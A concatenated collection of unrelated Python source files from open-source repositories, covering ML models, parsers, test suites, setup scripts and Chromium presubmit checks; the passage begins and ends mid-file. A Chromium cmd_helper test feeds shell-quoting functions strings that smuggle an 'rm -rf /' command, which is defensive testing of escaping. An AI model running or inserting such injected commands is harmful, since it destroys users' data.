tensor_adapter.TensorAdapterConfig] = None,
) -> beam.pvalue.PCollection:
signature_names = {}
for spec in eval_config.model_specs:
model_name = '' if len(eval_config.model_specs) == 1 else spec.name
signature_names[model_name] = [spec.signature_name]
return (extracts
| 'Predict' >> beam.ParDo(
model_util.ModelSignaturesDoFn(
eval_config=eval_config,
eval_shared_models=eval_shared_models,
signature_names={
constants.PREDICTIONS_KEY: signature_names},
prefer_dict_outputs=True,
tensor_adapter_config=tensor_adapter_config)))
|
Python/LongestSubstringWithoutRepeatingCharactersTest.py
|
TonnyL/Windary
| 205 |
65081
|
<filename>Python/LongestSubstringWithoutRepeatingCharactersTest.py
from unittest import TestCase
from LongestSubstringWithoutRepeatingCharacters import LongestSubstringWithoutRepeatingCharacters
class TestLongestSubstringWithoutRepeatingCharacters(TestCase):
def test_lengthOfLongestSubstring(self):
lswrc = LongestSubstringWithoutRepeatingCharacters()
# Expected: wke, 3
self.assertTrue(lswrc.lengthOfLongestSubstring("pwwkew") == 3)
# Expected: b, 1
self.assertTrue(lswrc.lengthOfLongestSubstring("bbbbb") == 1)
# Expected: abc, 3
self.assertTrue(lswrc.lengthOfLongestSubstring("abcabcbb") == 3)
# Expected: vdf, 3
self.assertTrue(lswrc.lengthOfLongestSubstring("dvdf") == 3)
|
example/python/permissions/can_detach_role.py
|
akshatkarani/iroha
| 1,467 |
65092
|
#
# Copyright Soramitsu Co., Ltd. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
#
from iroha import Iroha, IrohaCrypto
from iroha import primitive_pb2
import commons
admin = commons.new_user('admin@test')
alice = commons.new_user('alice@test')
iroha = Iroha(admin['id'])
@commons.hex
def genesis_tx():
test_permissions = [primitive_pb2.can_detach_role]
genesis_commands = commons.genesis_block(admin, alice, test_permissions)
tx = iroha.transaction(genesis_commands)
IrohaCrypto.sign_transaction(tx, admin['key'])
return tx
@commons.hex
def detach_role_tx():
tx = iroha.transaction([
iroha.command('DetachRole', account_id=admin['id'], role_name='test_role')
], creator_account=alice['id'])
IrohaCrypto.sign_transaction(tx, alice['key'])
return tx
|
venv/Lib/site-packages/notebook/terminal/handlers.py
|
BoxicaLion/BasicMathFormulas
| 445 |
65106
|
#encoding: utf-8
"""Tornado handlers for the terminal emulator."""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
from tornado import web
import terminado
from notebook._tz import utcnow
from ..base.handlers import IPythonHandler
from ..base.zmqhandlers import WebSocketMixin
class TerminalHandler(IPythonHandler):
"""Render the terminal interface."""
@web.authenticated
def get(self, term_name):
self.write(self.render_template('terminal.html',
ws_path="terminals/websocket/%s" % term_name))
class TermSocket(WebSocketMixin, IPythonHandler, terminado.TermSocket):
def origin_check(self):
"""Terminado adds redundant origin_check
Tornado already calls check_origin, so don't do anything here.
"""
return True
def get(self, *args, **kwargs):
if not self.get_current_user():
raise web.HTTPError(403)
return super(TermSocket, self).get(*args, **kwargs)
def on_message(self, message):
super(TermSocket, self).on_message(message)
self.application.settings['terminal_last_activity'] = utcnow()
def write_message(self, message, binary=False):
super(TermSocket, self).write_message(message, binary=binary)
self.application.settings['terminal_last_activity'] = utcnow()
|
cclib/bridge/cclib2pyquante.py
|
chemistry-scripts/cclib
| 224 |
65115
|
<reponame>chemistry-scripts/cclib
# -*- coding: utf-8 -*-
#
# Copyright (c) 2020, the cclib development team
#
# This file is part of cclib (http://cclib.github.io) and is distributed under
# the terms of the BSD 3-Clause License.
"""Bridge for using cclib data in PyQuante (http://pyquante.sourceforge.net)."""
import numpy
from cclib.parser.utils import find_package
class MissingAttributeError(Exception):
pass
_found_pyquante2 = find_package("pyquante2")
if _found_pyquante2:
from pyquante2 import molecule
def _check_pyquante():
if not _found_pyquante2:
raise ImportError("You must install `pyquante2` to use this function")
def makepyquante(data):
"""Create a PyQuante Molecule from ccData object."""
_check_pyquante()
# Check required attributes.
required_attrs = {"atomcoords", "atomnos"}
missing = [x for x in required_attrs if not hasattr(data, x)]
if missing:
missing = " ".join(missing)
raise MissingAttributeError(
"Could not create pyquante molecule due to missing attribute: {}".format(missing)
)
# In pyquante2, molecular geometry is specified in a format of:
# [(3,.0000000000, .0000000000, .0000000000), (1, .0000000000, .0000000000,1.629912)]
moldesc = numpy.insert(data.atomcoords[-1], 0, data.atomnos, 1).tolist()
return molecule(
[tuple(x) for x in moldesc],
units="Angstroms",
charge=data.charge,
multiplicity=data.mult,
)
del find_package
|
poetry/core/_vendor/tomlkit/source.py
|
avoltz/poetry-core
| 18,636 |
65118
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import itertools
from copy import copy
from typing import Any
from typing import Optional
from typing import Tuple
from typing import Type
from ._compat import PY2
from ._compat import unicode
from .exceptions import ParseError
from .exceptions import UnexpectedCharError
from .exceptions import UnexpectedEofError
from .toml_char import TOMLChar
class _State:
def __init__(
self, source, save_marker=False, restore=False
): # type: (_Source, Optional[bool], Optional[bool]) -> None
self._source = source
self._save_marker = save_marker
self.restore = restore
def __enter__(self): # type: () -> None
# Entering this context manager - save the state
if PY2:
# Python 2.7 does not allow to directly copy
# an iterator, so we have to make tees of the original
# chars iterator.
self._source._chars, self._chars = itertools.tee(self._source._chars)
else:
self._chars = copy(self._source._chars)
self._idx = self._source._idx
self._current = self._source._current
self._marker = self._source._marker
return self
def __exit__(self, exception_type, exception_val, trace):
# Exiting this context manager - restore the prior state
if self.restore or exception_type:
self._source._chars = self._chars
self._source._idx = self._idx
self._source._current = self._current
if self._save_marker:
self._source._marker = self._marker
class _StateHandler:
"""
State preserver for the Parser.
"""
def __init__(self, source): # type: (Source) -> None
self._source = source
self._states = []
def __call__(self, *args, **kwargs):
return _State(self._source, *args, **kwargs)
def __enter__(self): # type: () -> None
state = self()
self._states.append(state)
return state.__enter__()
def __exit__(self, exception_type, exception_val, trace):
state = self._states.pop()
return state.__exit__(exception_type, exception_val, trace)
class Source(unicode):
EOF = TOMLChar("\0")
def __init__(self, _): # type: (unicode) -> None
super(Source, self).__init__()
# Collection of TOMLChars
self._chars = iter([(i, TOMLChar(c)) for i, c in enumerate(self)])
self._idx = 0
self._marker = 0
self._current = TOMLChar("")
self._state = _StateHandler(self)
self.inc()
def reset(self):
# initialize both idx and current
self.inc()
# reset marker
self.mark()
@property
def state(self): # type: () -> _StateHandler
return self._state
@property
def idx(self): # type: () -> int
return self._idx
@property
def current(self): # type: () -> TOMLChar
return self._current
@property
def marker(self): # type: () -> int
return self._marker
def extract(self): # type: () -> unicode
"""
Extracts the value between marker and index
"""
return self[self._marker : self._idx]
def inc(self, exception=None): # type: (Optional[Type[ParseError]]) -> bool
"""
Increments the parser if the end of the input has not been reached.
Returns whether or not it was able to advance.
"""
try:
self._idx, self._current = next(self._chars)
return True
except StopIteration:
self._idx = len(self)
self._current = self.EOF
if exception:
raise self.parse_error(exception)
return False
def inc_n(self, n, exception=None): # type: (int, Exception) -> bool
"""
Increments the parser by n characters
if the end of the input has not been reached.
"""
for _ in range(n):
if not self.inc(exception=exception):
return False
return True
def consume(self, chars, min=0, max=-1):
"""
Consume chars until min/max is satisfied is valid.
"""
while self.current in chars and max != 0:
min -= 1
max -= 1
if not self.inc():
break
# failed to consume minimum number of characters
if min > 0:
self.parse_error(UnexpectedCharError)
def end(self): # type: () -> bool
"""
Returns True if the parser has reached the end of the input.
"""
return self._current is self.EOF
def mark(self): # type: () -> None
"""
Sets the marker to the index's current position
"""
self._marker = self._idx
def parse_error(
self, exception=ParseError, *args
): # type: (Type[ParseError], Any) -> ParseError
"""
Creates a generic "parse error" at the current position.
"""
line, col = self._to_linecol()
return exception(line, col, *args)
def _to_linecol(self): # type: () -> Tuple[int, int]
cur = 0
for i, line in enumerate(self.splitlines()):
if cur + len(line) + 1 > self.idx:
return (i + 1, self.idx - cur)
cur += len(line) + 1
return len(self.splitlines()), 0
|
modules/vc_decoder.py
|
shaun95/cotatron
| 202 |
65130
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from .cond_bn import ConditionalBatchNorm1d
# adopted Generator ResBlock from https://arxiv.org/abs/1909.11646
class GBlock(nn.Module):
def __init__(self, in_channels, out_channels, condition_dim):
super().__init__()
self.cond_bn = nn.ModuleList([
ConditionalBatchNorm1d(in_channels if i==0 else out_channels, condition_dim)
for i in range(4)])
self.leaky_relu = nn.LeakyReLU(0.2)
self.cnn = nn.ModuleList([
nn.Conv1d(in_channels if i==0 else out_channels, out_channels,
kernel_size=3, dilation=2**i, padding=2**i)
for i in range(4)])
self.shortcut = nn.Conv1d(in_channels, out_channels, kernel_size=1)
def forward(self, x, z, mask=None):
identity = x
x = self.cnn[0](self.leaky_relu(self.cond_bn[0](x, z)))
if mask is not None:
x.masked_fill_(mask, 0.0)
x = self.cnn[1](self.leaky_relu(self.cond_bn[1](x, z)))
if mask is not None:
x.masked_fill_(mask, 0.0)
x = x + self.shortcut(identity)
if mask is not None:
x.masked_fill_(mask, 0.0)
identity = x
x = self.cnn[2](self.leaky_relu(self.cond_bn[2](x, z)))
if mask is not None:
x.masked_fill_(mask, 0.0)
x = self.cnn[3](self.leaky_relu(self.cond_bn[3](x, z)))
if mask is not None:
x.masked_fill_(mask, 0.0)
x = x + identity
return x
class VCDecoder(nn.Module):
def __init__(self, hp):
super().__init__()
self.stem = nn.Conv1d(hp.chn.encoder + hp.chn.residual_out, hp.chn.gblock[0], kernel_size=7, padding=3)
self.gblock = nn.ModuleList([
GBlock(in_channels, out_channels, hp.chn.speaker.token)
for in_channels, out_channels in
zip(list(hp.chn.gblock)[:-1], hp.chn.gblock[1:])])
self.final = nn.Conv1d(hp.chn.gblock[-1], hp.audio.n_mel_channels, kernel_size=1)
def forward(self, x, speaker_emb, mask=None):
# x: linguistic features + pitch info.
# [B, chn.encoder + chn.residual_out, T_dec]
x = self.stem(x) # [B, chn.gblock[0], T]
if mask is not None:
x.masked_fill_(mask, 0.0)
for gblock in self.gblock:
x = gblock(x, speaker_emb, mask)
# x: [B, chn.gblock[-1], T]
x = self.final(x) # [B, M, T]
if mask is not None:
x.masked_fill_(mask, 0.0)
return x
|
setup.py
|
codalab/codalab-worksheets
| 236 |
65152
|
from setuptools import setup, find_packages
from setuptools.command.install import install
import os
import setuptools
import sys
# should match codalab/common.py#CODALAB_VERSION
CODALAB_VERSION = "1.1.4"
class Install(install):
_WARNING_TEMPLATE = (
'\n\n\033[1m\033[93mWarning! CodaLab was installed at {}, which is not\n'
'one of the following paths in $PATH:\n\n{}\n\nConsider adding {} to $PATH\n'
'to use the CodaLab CLI. You can do this by {}\033[0m\n\n'
)
_UNIX_FIX = 'appending the following line to your .bashrc:\nexport PATH="$PATH:{}"'
_WINDOWS_FIX = (
'by selecting System from the Control Panel, selecting Advanced system\n'
'settings, clicking Environment Variables and adding {} to the list.'
)
_WINDOWS_PLATFORM_VALUES = {'win32', 'cygwin'}
@staticmethod
def _build_fix_message(installed_path):
return (
Install._WINDOWS_FIX.format(installed_path)
if sys.platform in Install._WINDOWS_PLATFORM_VALUES
else Install._UNIX_FIX.format(installed_path)
)
def run(self):
install.run(self)
self._check_path()
def _check_path(self):
cl_path = self.install_scripts
executable_paths = os.environ['PATH'].split(os.pathsep)
if cl_path not in executable_paths:
# Prints a yellow, bold warning message in regards to the installation path not in $PATH
print(
Install._WARNING_TEMPLATE.format(
cl_path,
'\n'.join(executable_paths),
cl_path,
Install._build_fix_message(cl_path),
)
)
def get_requirements(*requirements_file_paths):
requirements = []
for requirements_file_path in requirements_file_paths:
with open(requirements_file_path) as requirements_file:
for line in requirements_file:
if line[0:2] != '-r':
requirements.append(line.strip())
return requirements
if int(setuptools.__version__.split('.')[0]) < 25:
print(
"WARNING: Please upgrade setuptools to a newer version, otherwise installation may break. "
"Recommended command: `pip3 install -U setuptools`"
)
setup(
name='codalab',
version=CODALAB_VERSION,
description='CLI for CodaLab, a platform for reproducible computation',
long_description=(
'Visit https://worksheets.codalab.org/ or setup your own server by following the '
'instructions in the documentation (https://codalab-worksheets.readthedocs.io/en/latest/Server-Setup).'
),
url='https://github.com/codalab/codalab-worksheets',
author='CodaLab',
author_email='<EMAIL>',
license='Apache License 2.0',
keywords='codalab reproducible computation worksheets competitions',
packages=find_packages(exclude=["tests*"]),
classifiers=[
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.6",
"License :: OSI Approved :: Apache Software License",
],
py_modules=['codalab_service'],
python_requires='~=3.6',
cmdclass={'install': Install},
include_package_data=True,
install_requires=get_requirements('requirements.txt'),
entry_points={
'console_scripts': [
'cl=codalab.bin.cl:main',
'cl-server=codalab.bin.server:main',
'cl-bundle-manager=codalab.bin.bundle_manager:main',
'codalab-service=codalab_service:main',
'cl-worker=codalab.worker.main:main',
'cl-worker-manager=codalab.worker_manager.main:main',
'cl-competitiond=scripts.competitiond:main',
]
},
zip_safe=False,
)
|
old/relu_static.py
|
flint-stone/OpenTPU
| 248 |
65154
|
<filename>old/relu_static.py
# Function: Relu and normalization
# Comments: offset defined during design phase (not runtime)
import pyrtl
# relu and normalization
def relu_nrml(din, offset=0):
assert len(din) == 32
assert offset <= 24
dout = pyrtl.WireVector(32)
with pyrtl.conditional_assignment:
with din[-1] == 0:
dout |= din
with pyrtl.otherwise:
dout |= 0
return dout[24-offset:32-offset]
# Test: collects only the 8 LSBs (after relu)
relu_in = pyrtl.Register(bitwidth=32, name='din')
relu_in.next <<= 300
offset = 24
dout = relu_nrml(relu_in, offset)
relu_out = pyrtl.Register(bitwidth=8, name='dout')
relu_out.next <<= dout
# simulate the instantiated design for 15 cycles
sim_trace = pyrtl.SimulationTrace()
sim = pyrtl.Simulation(tracer=sim_trace)
for cyle in range(35):
sim.step({})
sim_trace.render_trace()
|
adb/systrace/catapult/devil/devil/utils/cmd_helper_test.py
|
mohanedmoh/TBS
| 2,151 |
65169
|
<gh_stars>1000+
#!/usr/bin/env python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Tests for the cmd_helper module."""
import unittest
import subprocess
import sys
import time
from devil import devil_env
from devil.utils import cmd_helper
with devil_env.SysPath(devil_env.PYMOCK_PATH):
import mock # pylint: disable=import-error
class CmdHelperSingleQuoteTest(unittest.TestCase):
def testSingleQuote_basic(self):
self.assertEquals('hello',
cmd_helper.SingleQuote('hello'))
def testSingleQuote_withSpaces(self):
self.assertEquals("'hello world'",
cmd_helper.SingleQuote('hello world'))
def testSingleQuote_withUnsafeChars(self):
self.assertEquals("""'hello'"'"'; rm -rf /'""",
cmd_helper.SingleQuote("hello'; rm -rf /"))
def testSingleQuote_dontExpand(self):
test_string = 'hello $TEST_VAR'
cmd = 'TEST_VAR=world; echo %s' % cmd_helper.SingleQuote(test_string)
self.assertEquals(test_string,
cmd_helper.GetCmdOutput(cmd, shell=True).rstrip())
class CmdHelperDoubleQuoteTest(unittest.TestCase):
def testDoubleQuote_basic(self):
self.assertEquals('hello',
cmd_helper.DoubleQuote('hello'))
def testDoubleQuote_withSpaces(self):
self.assertEquals('"hello world"',
cmd_helper.DoubleQuote('hello world'))
def testDoubleQuote_withUnsafeChars(self):
self.assertEquals('''"hello\\"; rm -rf /"''',
cmd_helper.DoubleQuote('hello"; rm -rf /'))
def testSingleQuote_doExpand(self):
test_string = 'hello $TEST_VAR'
cmd = 'TEST_VAR=world; echo %s' % cmd_helper.DoubleQuote(test_string)
self.assertEquals('hello world',
cmd_helper.GetCmdOutput(cmd, shell=True).rstrip())
class CmdHelperShinkToSnippetTest(unittest.TestCase):
def testShrinkToSnippet_noArgs(self):
self.assertEquals('foo',
cmd_helper.ShrinkToSnippet(['foo'], 'a', 'bar'))
self.assertEquals("'foo foo'",
cmd_helper.ShrinkToSnippet(['foo foo'], 'a', 'bar'))
self.assertEquals('"$a"\' bar\'',
cmd_helper.ShrinkToSnippet(['foo bar'], 'a', 'foo'))
self.assertEquals('\'foo \'"$a"',
cmd_helper.ShrinkToSnippet(['foo bar'], 'a', 'bar'))
self.assertEquals('foo"$a"',
cmd_helper.ShrinkToSnippet(['foobar'], 'a', 'bar'))
def testShrinkToSnippet_singleArg(self):
self.assertEquals("foo ''",
cmd_helper.ShrinkToSnippet(['foo', ''], 'a', 'bar'))
self.assertEquals("foo foo",
cmd_helper.ShrinkToSnippet(['foo', 'foo'], 'a', 'bar'))
self.assertEquals('"$a" "$a"',
cmd_helper.ShrinkToSnippet(['foo', 'foo'], 'a', 'foo'))
self.assertEquals('foo "$a""$a"',
cmd_helper.ShrinkToSnippet(['foo', 'barbar'], 'a', 'bar'))
self.assertEquals('foo "$a"\' \'"$a"',
cmd_helper.ShrinkToSnippet(['foo', 'bar bar'], 'a', 'bar'))
self.assertEquals('foo "$a""$a"\' \'',
cmd_helper.ShrinkToSnippet(['foo', 'barbar '], 'a', 'bar'))
self.assertEquals('foo \' \'"$a""$a"\' \'',
cmd_helper.ShrinkToSnippet(['foo', ' barbar '], 'a', 'bar'))
_DEFAULT = 'DEFAULT'
class _ProcessOutputEvent(object):
def __init__(self, select_fds=_DEFAULT, read_contents=None, ts=_DEFAULT):
self.select_fds = select_fds
self.read_contents = read_contents
self.ts = ts
class _MockProcess(object):
def __init__(self, output_sequence=None, return_value=0):
# Arbitrary.
fake_stdout_fileno = 25
self.mock_proc = mock.MagicMock(spec=subprocess.Popen)
self.mock_proc.stdout = mock.MagicMock()
self.mock_proc.stdout.fileno = mock.MagicMock(
return_value=fake_stdout_fileno)
self.mock_proc.returncode = None
self._return_value = return_value
# This links the behavior of os.read, select.select, time.time, and
# <process>.poll. The output sequence can be thought of as a list of
# return values for select.select with corresponding return values for
# the other calls at any time between that select call and the following
# one. We iterate through the sequence only on calls to select.select.
#
# os.read is a special case, though, where we only return a given chunk
# of data *once* after a given call to select.
if not output_sequence:
output_sequence = []
# Use an leading element to make the iteration logic work.
initial_seq_element = _ProcessOutputEvent(
_DEFAULT, '',
output_sequence[0].ts if output_sequence else _DEFAULT)
output_sequence.insert(0, initial_seq_element)
for o in output_sequence:
if o.select_fds == _DEFAULT:
if o.read_contents is None:
o.select_fds = []
else:
o.select_fds = [fake_stdout_fileno]
if o.ts == _DEFAULT:
o.ts = time.time()
self._output_sequence = output_sequence
self._output_seq_index = 0
self._read_flags = [False] * len(output_sequence)
def read_side_effect(*_args, **_kwargs):
if self._read_flags[self._output_seq_index]:
return None
self._read_flags[self._output_seq_index] = True
return self._output_sequence[self._output_seq_index].read_contents
def select_side_effect(*_args, **_kwargs):
if self._output_seq_index is None:
self._output_seq_index = 0
else:
self._output_seq_index += 1
if self._output_seq_index < len(self._output_sequence):
return (self._output_sequence[self._output_seq_index].select_fds,
None, None)
else:
return([], None, None)
def time_side_effect(*_args, **_kwargs):
return self._output_sequence[self._output_seq_index].ts
def poll_side_effect(*_args, **_kwargs):
if self._output_seq_index >= len(self._output_sequence) - 1:
self.mock_proc.returncode = self._return_value
return self.mock_proc.returncode
mock_read = mock.MagicMock(side_effect=read_side_effect)
mock_select = mock.MagicMock(side_effect=select_side_effect)
mock_time = mock.MagicMock(side_effect=time_side_effect)
self.mock_proc.poll = mock.MagicMock(side_effect=poll_side_effect)
# Set up but *do not start* the mocks.
self._mocks = [
mock.patch('os.read', new=mock_read),
mock.patch('select.select', new=mock_select),
mock.patch('time.time', new=mock_time),
]
if sys.platform != 'win32':
self._mocks.append(mock.patch('fcntl.fcntl'))
def __enter__(self):
for m in self._mocks:
m.__enter__()
return self.mock_proc
def __exit__(self, exc_type, exc_val, exc_tb):
for m in reversed(self._mocks):
m.__exit__(exc_type, exc_val, exc_tb)
class CmdHelperIterCmdOutputLinesTest(unittest.TestCase):
"""Test IterCmdOutputLines with some calls to the unix 'seq' command."""
# This calls _IterCmdOutputLines rather than IterCmdOutputLines s.t. it
# can mock the process.
# pylint: disable=protected-access
_SIMPLE_OUTPUT_SEQUENCE = [
_ProcessOutputEvent(read_contents='1\n2\n'),
]
def testIterCmdOutputLines_success(self):
with _MockProcess(
output_sequence=self._SIMPLE_OUTPUT_SEQUENCE) as mock_proc:
for num, line in enumerate(
cmd_helper._IterCmdOutputLines(mock_proc, 'mock_proc'), 1):
self.assertEquals(num, int(line))
def testIterCmdOutputLines_exitStatusFail(self):
with self.assertRaises(subprocess.CalledProcessError):
with _MockProcess(output_sequence=self._SIMPLE_OUTPUT_SEQUENCE,
return_value=1) as mock_proc:
for num, line in enumerate(
cmd_helper._IterCmdOutputLines(mock_proc, 'mock_proc'), 1):
self.assertEquals(num, int(line))
# after reading all the output we get an exit status of 1
def testIterCmdOutputLines_exitStatusIgnored(self):
with _MockProcess(output_sequence=self._SIMPLE_OUTPUT_SEQUENCE,
return_value=1) as mock_proc:
for num, line in enumerate(
cmd_helper._IterCmdOutputLines(
mock_proc, 'mock_proc', check_status=False),
1):
self.assertEquals(num, int(line))
def testIterCmdOutputLines_exitStatusSkipped(self):
with _MockProcess(output_sequence=self._SIMPLE_OUTPUT_SEQUENCE,
return_value=1) as mock_proc:
for num, line in enumerate(
cmd_helper._IterCmdOutputLines(mock_proc, 'mock_proc'), 1):
self.assertEquals(num, int(line))
# no exception will be raised because we don't attempt to read past
# the end of the output and, thus, the status never gets checked
if num == 2:
break
def testIterCmdOutputLines_delay(self):
output_sequence = [
_ProcessOutputEvent(read_contents='1\n2\n', ts=1),
_ProcessOutputEvent(read_contents=None, ts=2),
_ProcessOutputEvent(read_contents='Awake', ts=10),
]
with _MockProcess(output_sequence=output_sequence) as mock_proc:
for num, line in enumerate(
cmd_helper._IterCmdOutputLines(mock_proc, 'mock_proc',
iter_timeout=5), 1):
if num <= 2:
self.assertEquals(num, int(line))
elif num == 3:
self.assertEquals(None, line)
elif num == 4:
self.assertEquals('Awake', line)
else:
self.fail()
if __name__ == '__main__':
unittest.main()
|
spaghetti/tests/test_api_network.py
|
gegen07/spaghetti
| 182 |
65183
|
<filename>spaghetti/tests/test_api_network.py<gh_stars>100-1000
""" Testing for the spaghetti api import structure.
"""
import unittest
from .network_unittest_classes import TestNetwork
from .network_unittest_classes import TestNetworkPointPattern
from .network_unittest_classes import TestNetworkAnalysis
# api import structure
import spaghetti
# run tests on spaghetti.network.Network
TestNetwork.spaghetti = spaghetti
TestNetwork()
# run tests on spaghetti.network.PointPattern
TestNetworkPointPattern.spaghetti = spaghetti
TestNetworkPointPattern()
# run tests on spaghetti.analysis
TestNetworkAnalysis.spaghetti = spaghetti
TestNetworkAnalysis()
if __name__ == "__main__":
unittest.main()
|
lib/django-1.4/django/core/management/commands/sqlcustom.py
|
MiCHiLU/google_appengine_sdk
| 790 |
65185
|
from optparse import make_option
from django.core.management.base import AppCommand
from django.core.management.sql import sql_custom
from django.db import connections, DEFAULT_DB_ALIAS
class Command(AppCommand):
help = "Prints the custom table modifying SQL statements for the given app name(s)."
option_list = AppCommand.option_list + (
make_option('--database', action='store', dest='database',
default=DEFAULT_DB_ALIAS, help='Nominates a database to print the '
'SQL for. Defaults to the "default" database.'),
)
output_transaction = True
def handle_app(self, app, **options):
return u'\n'.join(sql_custom(app, self.style, connections[options.get('database')])).encode('utf-8')
|
examples/pytorch/text_classification/data/trec/data_preparation.py
|
cminusQAQ/graph4nlp
| 1,269 |
65195
|
<reponame>cminusQAQ/graph4nlp<gh_stars>1000+
import sys
import chardet
fin = open(sys.argv[1], "rb")
fout = open(sys.argv[2], "w")
for line in fin:
try:
line = line.decode("utf-8")
except Exception:
line = line.decode(chardet.detect(line)["encoding"])
data = line.strip().split()
text = " ".join(data[1:])
label = data[0].split(":")[0]
fout.write("{}\t{}\n".format(text, label))
|
cesium/features/common_functions.py
|
acrellin/cesium
| 603 |
65211
|
<filename>cesium/features/common_functions.py<gh_stars>100-1000
import numpy as np
from scipy import stats
def max_slope(t, x):
"""Compute the largest rate of change in the observed data."""
slopes = np.diff(x) / np.diff(t)
return np.max(np.abs(slopes))
def maximum(x):
"""Maximum observed value."""
return np.max(x)
def median(x):
"""Median of observed values."""
return np.median(x)
def median_absolute_deviation(x):
"""Median absolute deviation (from the median) of the observed values."""
return np.median(np.abs(x - np.median(x)))
def minimum(x):
"""Minimum observed value."""
return np.min(x)
def percent_beyond_1_std(x, e):
"""Percentage of values more than 1 std. dev. from the weighted average."""
dists_from_mu = x - weighted_average(x, e)
return np.mean(np.abs(dists_from_mu) > weighted_std_dev(x, e))
def percent_close_to_median(x, window_frac=0.1):
"""Percentage of values within window_frac*(max(x)-min(x)) of median."""
window = (x.max() - x.min()) * window_frac
return np.mean(np.abs(x - np.median(x)) < window)
def skew(x):
"""Skewness of a dataset. Approximately 0 for Gaussian data."""
return stats.skew(x)
def std(x):
"""Standard deviation of observed values."""
return np.std(x)
def weighted_average(x, e):
"""Arithmetic mean of observed values, weighted by measurement errors."""
return np.average(x, weights=1. / (e**2))
def weighted_average_std_err(x, e):
"""
Standard deviation of the sample weighted average of values x with
measurement errors e.
Note: this is not the same as the weighted sample standard deviation;
this value only quantifies the measurement errors, not the dispersion of
the data.
"""
return np.sqrt(1.0 / np.sum(e**2))
def weighted_std_dev(x, e):
"""Standard deviation of observed values, weighted by measurement errors."""
return np.sqrt(np.average((x - weighted_average(x, e))**2,
weights=1. / (e**2)))
|
infra/config/PRESUBMIT.py
|
chromium/chromium
| 14,668 |
65214
|
<filename>infra/config/PRESUBMIT.py
# Copyright 2018 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Enforces luci-milo.cfg consistency.
See http://dev.chromium.org/developers/how-tos/depottools/presubmit-scripts
for more details on the presubmit API built into depot_tools.
"""
PRESUBMIT_VERSION = '2.0.0'
USE_PYTHON3 = True
_IGNORE_FREEZE_FOOTER = 'Ignore-Freeze'
# The time module's handling of timezones is abysmal, so the boundaries are
# precomputed in UNIX time
_FREEZE_START = 1639641600 # 2021/12/16 00:00 -0800
_FREEZE_END = 1641196800 # 2022/01/03 00:00 -0800
def CheckFreeze(input_api, output_api):
if _FREEZE_START <= input_api.time.time() < _FREEZE_END:
footers = input_api.change.GitFootersFromDescription()
if _IGNORE_FREEZE_FOOTER not in footers:
def convert(t):
ts = input_api.time.localtime(t)
return input_api.time.strftime('%Y/%m/%d %H:%M %z', ts)
return [
output_api.PresubmitError(
'There is a prod freeze in effect from {} until {},'
' files in //infra/config cannot be modified'.format(
convert(_FREEZE_START), convert(_FREEZE_END)))
]
return []
def CheckTests(input_api, output_api):
glob = input_api.os_path.join(input_api.PresubmitLocalPath(), '*_test.py')
tests = input_api.canned_checks.GetUnitTests(input_api,
output_api,
input_api.glob(glob),
run_on_python2=False,
run_on_python3=True,
skip_shebang_check=True)
return input_api.RunTests(tests)
def CheckLintLuciMilo(input_api, output_api):
if ('infra/config/generated/luci/luci-milo.cfg' in input_api.LocalPaths()
or 'infra/config/lint-luci-milo.py' in input_api.LocalPaths()):
return input_api.RunTests([
input_api.Command(
name='lint-luci-milo',
cmd=[input_api.python_executable, 'lint-luci-milo.py'],
kwargs={},
message=output_api.PresubmitError),
])
return []
def CheckTestingBuildbot(input_api, output_api):
if ('infra/config/generated/luci/luci-milo.cfg' in input_api.LocalPaths() or
'infra/config/generated/luci/luci-milo-dev.cfg' in input_api.LocalPaths()
):
return input_api.RunTests([
input_api.Command(
name='testing/buildbot config checks',
cmd=[input_api.python_executable, input_api.os_path.join(
'..', '..', 'testing', 'buildbot',
'generate_buildbot_json.py',),
'--check'],
kwargs={},
message=output_api.PresubmitError),
])
return []
def CheckLucicfgGenOutputMain(input_api, output_api):
return input_api.RunTests(input_api.canned_checks.CheckLucicfgGenOutput(
input_api, output_api, 'main.star'))
def CheckLucicfgGenOutputDev(input_api, output_api):
return input_api.RunTests(input_api.canned_checks.CheckLucicfgGenOutput(
input_api, output_api, 'dev.star'))
def CheckChangedLUCIConfigs(input_api, output_api):
return input_api.canned_checks.CheckChangedLUCIConfigs(
input_api, output_api)
# Footer indicating a CL that is trying to address an outage by some mechanism
# other than those in infra/config/outages
_OUTAGE_ACTION_FOOTER = 'Infra-Config-Outage-Action'
# Footer acknowledging that an outages configuration is in effect when making an
# unrelated change
_IGNORE_OUTAGE_FOOTER = 'Infra-Config-Ignore-Outage'
def CheckOutagesConfigOnCommit(input_api, output_api):
outages_pyl = input_api.os_path.join(
input_api.PresubmitLocalPath(), 'generated/outages.pyl')
with open(outages_pyl) as f:
outages_config = input_api.ast.literal_eval(f.read())
if not outages_config:
footers = input_api.change.GitFootersFromDescription()
return [
output_api.PresubmitError(
'There is no outages configuration in effect, '
'please remove the {} footer from your CL description.'
.format(footer))
for footer in (_OUTAGE_ACTION_FOOTER, _IGNORE_OUTAGE_FOOTER)
if footer in footers
]
# Any of the config files under infra/config/outages
outages_config_files = set()
# Any of the config files under infra/config/generated
generated_config_files = set()
# Any config files that are not under infra/config/outages or
# infra/config/generated
config_files = set()
for p in input_api.LocalPaths():
if p in ('README.md', 'OWNERS'):
continue
if p.startswith('infra/config/outages/'):
outages_config_files.add(p)
continue
if p.startswith('infra/config/generated/'):
generated_config_files.add(p)
continue
config_files.add(p)
# If the only changes to non-generated config fies were the outages files,
# assume the change was addressing an outage and that no additional mechanism
# needs to be added
if outages_config_files and not config_files:
# REVIEWER: Should we prevent the footers from being here in this case?
return []
# If any non-generated, non-outages files were modified or if the generated
# config files were modified without any config files being modified (lucicfg
# change, etc.) then make sure the user knows that when the outages
# configuration is disabled, the generated configuration may change
if config_files or generated_config_files:
footers = input_api.change.GitFootersFromDescription()
has_action_footer = _OUTAGE_ACTION_FOOTER in footers
has_ignore_footer = _IGNORE_OUTAGE_FOOTER in footers
if has_action_footer and has_ignore_footer:
return [
output_api.PresubmitError(
'Only one of {} or {} should be present in your CL description'
